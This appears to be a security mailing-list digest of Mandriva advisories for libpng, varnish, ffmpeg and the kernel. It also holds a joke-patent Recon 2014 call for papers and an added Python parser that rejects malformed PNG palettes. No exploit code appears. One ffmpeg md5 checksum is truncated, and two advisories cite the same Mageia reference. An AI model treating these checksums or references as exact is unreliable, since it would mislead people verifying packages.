3b3d03da06f07f56075853827a2dacdb  mes5/i586/libpng-static-devel-1.2.31-2.8mdvmes5.2.i586.rpm
4a2f827b292cdc03f63566eae8c812cd  mes5/SRPMS/libpng-1.2.31-2.8mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
3fe33312ba78608e46f63cda12b110db  mes5/x86_64/lib64png3-1.2.31-2.8mdvmes5.2.x86_64.rpm
90fa95818ad0d287ef9555edef4a882a  mes5/x86_64/lib64png-devel-1.2.31-2.8mdvmes5.2.x86_64.rpm
6b7626467754aed28ca5f77904451567  mes5/x86_64/lib64png-static-devel-1.2.31-2.8mdvmes5.2.x86_64.rpm
dd60b577dd6e9ce8b934e25ca4e546c8  mes5/x86_64/libpng-source-1.2.31-2.8mdvmes5.2.x86_64.rpm
4a2f827b292cdc03f63566eae8c812cd  mes5/SRPMS/libpng-1.2.31-2.8mdvmes5.2.src.rpm

Mandriva Business Server 1/X86_64:
9237e9d4b379d48a06c8cef5f6153549  mbs1/x86_64/lib64png12_0-1.2.49-2.1.mbs1.x86_64.rpm
dc285e45a37d56f3846eb390a861f4db  mbs1/x86_64/lib64png12-devel-1.2.49-2.1.mbs1.x86_64.rpm
df04f10a3f6444219d39ab0dae2dc5eb  mbs1/x86_64/lib64png15_15-1.5.10-2.1.mbs1.x86_64.rpm
d47b514f7851a4bcfad6b5e63e6b6454  mbs1/x86_64/lib64png-devel-1.5.10-2.1.mbs1.x86_64.rpm
fda6b6933c420961f4cdaf8a7d82e986  mbs1/SRPMS/libpng12-1.2.49-2.1.mbs1.src.rpm
03558969532f7161705ef96cef74b019  mbs1/SRPMS/libpng-1.5.10-2.1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFTAd0ymqjQ0CJFipgRAvVZAKCFN8Mi8xxQmTF9tqO+IJKcYFYk4wCgluTx
yzTHgzcGw5oVSkHvJLImowk=
=uhOm
-----END PGP SIGNATURE-----
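The advisory's one-line description (a zero-byte PLTE chunk or a missing palette reaching png_do_expand_palette) is the kind of input a decoder has to reject during chunk parsing, before any palette pointer is dereferenced. The following added Python example (not libpng code, and not from Mandriva) parses a PNG chunk stream with CRC checks and then applies the palette sanity rules; the sample images it checks are built inline for the example, and the rejection strings are its own.

```python
"""Defensive PNG chunk parser that refuses the palette shapes behind
CVE-2013-6954 (empty PLTE, or no PLTE at all for an indexed-colour image).

Added example, not libpng code. Sample images are built inline.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
COLOR_TYPE_INDEXED = 3


def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Encode one chunk: length, type, payload, CRC over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def parse_png_chunks(data: bytes):
    """Return [(type, payload), ...]; raise ValueError on malformed framing."""
    if not data.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos, chunks = len(PNG_SIG), []
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if length > 0x7FFFFFFF:          # spec limit; also blocks length games
            raise ValueError("chunk length out of range")
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk payload")
        payload = data[start:end]
        (stored_crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != stored_crc:
            raise ValueError(f"bad CRC on {ctype!r}")
        chunks.append((ctype, payload))
        pos = end + 4
        if ctype == b"IEND":
            break
    return chunks


def check_palette(chunks) -> str:
    """Return 'ok' or a rejection reason describing the palette problem."""
    if not chunks or chunks[0][0] != b"IHDR" or len(chunks[0][1]) != 13:
        return "reject: first chunk is not a valid IHDR"
    _w, _h, _depth, color_type, _c, _f, _i = struct.unpack(">IIBBBBB", chunks[0][1])
    plte = [p for t, p in chunks if t == b"PLTE"]
    if len(plte) > 1:
        return "reject: more than one PLTE chunk"
    if not plte:
        # A NULL palette is what an indexed-colour expander must never touch.
        if color_type == COLOR_TYPE_INDEXED:
            return "reject: indexed image without PLTE"
        return "ok"
    payload = plte[0]
    if len(payload) == 0:
        return "reject: empty PLTE"
    if len(payload) % 3:
        return "reject: PLTE length not a multiple of 3"
    if len(payload) // 3 > 256:
        return "reject: more than 256 palette entries"
    return "ok"


def build_sample_png(palette, color_type=COLOR_TYPE_INDEXED) -> bytes:
    """Constructed 1x1 image for the example; palette=None omits PLTE."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, color_type, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")      # filter byte + one 8-bit sample
    png = PNG_SIG + make_chunk(b"IHDR", ihdr)
    if palette is not None:
        png += make_chunk(b"PLTE", palette)
    return png + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b"")


if __name__ == "__main__":
    for label, pal in [("valid", b"\xff\x00\x00"), ("empty PLTE", b""), ("no PLTE", None)]:
        print(f"{label:10} -> {check_palette(parse_png_chunks(build_sample_png(pal)))}")
```

Framing and semantics are separated on purpose: parse_png_chunks only guarantees that every chunk is complete and its CRC matches, while check_palette decides whether the palette is usable, so a caller can report which layer rejected a file.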
[ MDVSA-2014:036 ] varnish
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:036
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : varnish
Date    : February 17, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Updated varnish packages fix security vulnerabilities:

Varnish before 3.0.5 allows remote attackers to cause a denial of
service (child-process crash and temporary caching outage) via a GET
request with trailing whitespace characters and no URI (CVE-2013-4484).

Also, the services have been converted from SysV init scripts to
systemd-native services, which should allow for more consistent behavior.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4484
http://advisories.mageia.org/MGASA-2014-0065.html
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
6000b9509f578e6ea82e6d3b1644b4f2  mbs1/x86_64/lib64varnish1-3.0.3-0.2.mbs1.x86_64.rpm
815b13bbbdab794e2b93dc4506424d6c  mbs1/x86_64/lib64varnish-devel-3.0.3-0.2.mbs1.x86_64.rpm
56decba0182e274354a9abb7b18432e6  mbs1/x86_64/varnish-3.0.3-0.2.mbs1.x86_64.rpm
677e6e2ed82db3e64b6ed07bf03258e3  mbs1/SRPMS/varnish-3.0.3-0.2.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFTAhKOmqjQ0CJFipgRAujTAKCGmfMzeDx9PxP7MKyrc9PFB6METwCeMxTj
ctxFW9n8yI8AifPeqA0JVrY=
=VqTb
-----END PGP SIGNATURE-----
Recon 2014 Call For Papers - June 27-29, 2014 - Montreal, Quebec
CHRISTMAS ISLANDS PATENT APPLICATION 20142329
RECON 2014
February 17th, 2014

BACKGROUND

[FIELD OF INVENTION]

- REcon 2014 is a computer security conference for reverse engineers, hackers, and enthusiasts.
- This patent lays claim to all security conferences and gatherings of hackers where 50% or more of the attendance consists of reverse engineers.

[DESCRIPTION OF RELATED ART]

- Presently there are many awesome security conferences, but REcon is the only one we know of that is dedicated to reverse engineering. Reversing is our jam.
- Numerous other security conferences exist that are worthy of props. Our conference refines the art with a strong focus on the topic of reverse engineering and features highly technical talks.

[FIG. 1]

SUMMARY

REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada. The conference offers a single track of presentations over the span of three days along with technical training sessions held before the presentation dates. Technical training varies in length between two and four days.

REcon 2014 is almost here and we have another great line up of trainings and shenanigans. This year we feel the need to patent our unique brand of awesome before someone else tries to take it away from us.

DETAILED DESCRIPTION

REcon is an event defined by our attendees, speakers, and trainers. The attendees have always been, and will always be, those looking to learn something new, share ideas, and unwind in a welcoming environment.

The trainers are the best in their fields. This year we are bringing together a great set of trainings.

- Reversing telecom platforms for security: applied hacking on legacy monolithic MSC and HLR to modular ATCA's reversing by Philippe Langlois (2 days: 25-26 June)
- Introduction to USB Emulation with the Facedancer by Travis Goodspeed and Sergey Bratus (2 days: 25-26 June)
- The Exploit Laboratory: Red Team by Saumil Shah (2 days: 23-24 June)
- The Exploit Laboratory: Master by Saumil Shah (2 days: 25-26 June)
- Reverse Engineering Malware by Nicolas Brulez (4 days: 23-26 June)
- iOS 7 Kernel Exploitation Training by Stefan Esser (4 days: 23-26 June)
- Keep It Synple Stupid - Utilizing Programmable Logic for Hardware Reverse-Engineering by Dmitry Nedospasov and Thorsten Schroeder (4 days: 23-26 June)
- Windows Internals for Reverse Engineers by Alex Ionescu (4 days: 23-26 June)

The speakers define the conference and we invite you to submit for this year's REcon CFP. The conference features a single track of talks. Some guidelines for talks are:

- 30 to 60 minute presentations, or longer, we are flexible
- We are open to proposals for workshops that would occur alongside talks
- Trainings of 2, 3 or 4 days focused on reversing and/or exploitation
- There will be time for five to ten minute informal lightning talks during the REcon party

The conference talks in the following fields are encouraged:

- Hardware reverse engineering
- Software reverse engineering
- Protocol reverse engineering
- Finding vulnerabilities and writing exploits
- Novel data visualization for hackers and reverse engineers
- Bypassing security and software protections
- Attacks on cryptography in hardware and software
- Techniques for any of the above on new or interesting architectures
- Wireless hacking (We aren't talking about wifi here)
++ Anything else elite ++

The more description you provide, the more you are able to claim as your invention.
[ MDVSA-2014:037 ] ffmpeg
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:037
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : ffmpeg
Date    : February 17, 2014
Affected: Business Server 1.0, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Updated ffmpeg packages fix security vulnerabilities:

This update provides ffmpeg version 0.5.13 and 0.10.11, which fixes
several unspecified security vulnerabilities and other bugs which were
corrected upstream.
_______________________________________________________________________

References:

http://www.ffmpeg.org/security.html
http://git.videolan.org/?p=ffmpeg.git;a=log;h=n0.5.13
http://git.videolan.org/?p=ffmpeg.git;a=log;h=n0.10.11
http://advisories.mageia.org/MGASA-2014-0065.html
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5:
7742b0588624f60c376be19b4d89a8fd  mes5/i586/ffmpeg-0.5.13-0.1mdvmes5.2.i586.rpm
c14a0eb8817bae066df5373687b5d0d6  mes5/i586/libavformats52-0.5.13-0.1mdvmes5.2.i586.rpm
9ecf8648a04938937a8faea452f6d497  mes5/i586/libavutil49-0.5.13-0.1mdvmes5.2.i586.rpm
c458420fb9e790aa41d8abf748692c2e  mes5/i586/libffmpeg52-0.5.13-0.1mdvmes5.2.i586.rpm
eced4907f2997e3f4ca5d1dee2b62016  mes5/i586/libffmpeg-devel-0.5.13-0.1mdvmes5.2.i586.rpm
72bb5e239cafa24058549dea4bdc8f49  mes5/i586/libffmpeg-static-devel-0.5.13-0.1mdvmes5.2.i586.rpm
7ecee41b7b2815b0823a8658ca06  mes5/i586/libpostproc51-0.5.13-0.1mdvmes5.2.i586.rpm
12d20764ba57fbf71ee9654a4eb64d3f  mes5/i586/libswscaler0-0.5.13-0.1mdvmes5.2.i586.rpm
6e96bd5abc38a8a8f58a196af556f806  mes5/SRPMS/ffmpeg-0.5.13-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
1624df142a467f3a3de4955dd810a1ce  mes5/x86_64/ffmpeg-0.5.13-0.1mdvmes5.2.x86_64.rpm
d60b7b155f3ae1f90232ecd32ab5d391  mes5/x86_64/lib64avformats52-0.5.13-0.1mdvmes5.2.x86_64.rpm
595dab63bbec115366304d565b86aeb1  mes5/x86_64/lib64avutil49-0.5.13-0.1mdvmes5.2.x86_64.rpm
adabce9fedc7086f039626437b7a8004  mes5/x86_64/lib64ffmpeg52-0.5.13-0.1mdvmes5.2.x86_64.rpm
1816cb6946b0f3548c0c424858c51340  mes5/x86_64/lib64ffmpeg-devel-0.5.13-0.1mdvmes5.2.x86_64.rpm
9466173717a6bb74ac05aff1baf255a8  mes5/x86_64/lib64ffmpeg-static-devel-0.5.13-0.1mdvmes5.2.x86_64.rpm
b6eb83c3ee6aebf979475f85bffde920  mes5/x86_64/lib64postproc51-0.5.13-0.1mdvmes5.2.x86_64.rpm
52fbf256d72995e157a1cbacf70a4218  mes5/x86_64/lib64swscaler0-0.5.13-0.1mdvmes5.2.x86_64.rpm
6e96bd5abc38a8a8f58a196af556f806  mes5/SRPMS/ffmpeg-0.5.13-0.1mdvmes5.2.src.rpm

Mandriva Business Server 1/X86_64:
9264f9935448582010c136761e90550c  mbs1/x86_64/ffmpeg-0.10.11-1.mbs1.x86_64.rpm
ff6207bacb56aac2f6a298c2bde79b33  mbs1/x86_64/lib64avcodec53-0.10.11-1.mbs1.x86_64.rpm
3b9202057b4f48eb3d3c4a7041af79ae  mbs1/x86_64/lib64avfilter2-0.10.11-1.mbs1.x86_64.rpm
02eb33c9845ffd1bb85f01689e5f7831  mbs1/x86_64/lib64avformat53-0.10.11-1.mbs1.x86_64.rpm
63ef87449b5f5941b503fed7b81444f6  mbs1/x86_64/lib64avutil51-0.10.11-1.mbs1.x86_64.rpm
9adeeb722da49ad90998df4070f284e0  mbs1/x86_64/lib64ffmpeg-devel-0.10.11-1.mbs1.x86_64.rpm
cd2e95670c3f87abca0601de3f89e53b  mbs1/x86_64/lib64ffmpeg-static-devel-0.10.11-1.mbs1.x86_64.rpm
339ee84802d8662336596cbac58eee43  mbs1/x86_64/lib64postproc52-0.10.11-1.mbs1.x86_64.rpm
98ee40b039272a3e2fc8b13c59c530ff  mbs1/x86_64/lib64swresample0-0.10.11-1.mbs1.x86_64.rpm
beaa3a178f877b0b2122ec8f24261448  mbs1/x86_64/lib64swscaler2-0.10.11-1.mbs1.x86_64.rpm
a0c84e846e09588c4194ec665745b984  mbs1/SRPMS/ffmpeg-0.10.11-1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFTAh1DmqjQ0CJFipgRAsDrAJ0WKhyBoo611fOC5M8yN9qqcPD3rACeJ7jz
m+V0nwlGpKVgBHjhe1cjYdk=
=xoRs
-----END PGP SIGNATURE-----
[ MDVSA-2014:038 ] kernel
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:038
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : kernel
Date    : February 17, 2014
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities have been found and corrected in the Linux
kernel:

The compat_sys_recvmmsg function in net/compat.c in the Linux kernel
before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to
gain privileges via a recvmmsg system call with a crafted timeout
pointer parameter (CVE-2014-0038).

The restore_fpu_checking function in arch/x86/include/asm/fpu-internal.h
in the Linux kernel before 3.12.8 on the AMD K7 and K8 platforms does
not clear pending exceptions before proceeding to an EMMS instruction,
which allows local users to cause a denial of service (task kill) or
possibly gain privileges via a crafted application (CVE-2014-1438).

The yam_ioctl function in drivers/net/hamradio/yam.c in the Linux kernel
before 3.12.8 does not initialize a certain structure member, which
allows local users to obtain sensitive information from kernel memory by
leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG ioctl call
(CVE-2014-1446).

The updated packages provide a solution for these security issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1438
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1446
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
d1faf9544075ff4790e29edd6e7061f6  mbs1/x86_64/cpupower-3.4.80-1.1.mbs1.x86_64.rpm
3498721d639bf646ed55e2903ce728e4  mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.noarch.rpm
f9927f4b1512a26d874a82a99636fb09  mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.src.rpm
e874467839b96e04bebd0c5b24f31fc3  mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.src.rpm
208f74225f3d18189a871ac308c8df5b  mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.x86_64.rpm
e1f82c2b50db46cdb4db2daa933f7173  mbs1/x86_64/kernel-server-3.4.80-1.1.mbs1.x86_64.rpm
ed0d8eed6c61553e73121117bcfc978f  mbs1/x86_64/kernel-server-devel-3.4.80-1.1.mbs1.x86_64.rpm
00ca38d2289182149e8f43c6871711e8  mbs1/x86_64/kernel-source-3.4.80-1.mbs1.noarch.rpm
429b6e48ee63a03a83577a710bc5368d  mbs1/x86_64/lib64cpupower0-3.4.80-1.1.mbs1.x86_64.rpm
a6e3898905be2a8d7ded39a5312f7670  mbs1/x86_64/lib64cpupower-devel-3.4.80-1.1.mbs1.x86_64.rpm
086bc3e49adec4147aa1138ae5d5245c  mbs1/x86_64/perf-3.4.80-1.1.mbs1.x86_64.rpm
f5a65feb515d65f9f1f526f6294af2c3  mbs1/SRPMS/cpupower-3.4.80-1.1.mbs1.src.rpm
56fafb86f60233b29fcd8d42d35e4678  mbs1/SRPMS/kernel-server-3.4.80-1.1.mbs1.src.rpm
715647161acd9ec082c0a2fef0f35fc3  mbs1/SRPMS/kernel-source-3.4.80-1.mbs1.src.rpm
cc72e360fa32823a575d1c9536fdecc3  mbs1/SRPMS/perf-3.4.80-1.1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFTAiBGmqjQ0CJFipgRAiryAKCz6vqRlzaZ+l0B6QyuMb95i8UVoACgjAGx
F7TlfjN081P00FfeKN47Je4=
=osPP
-----END PGP SIGNATURE-----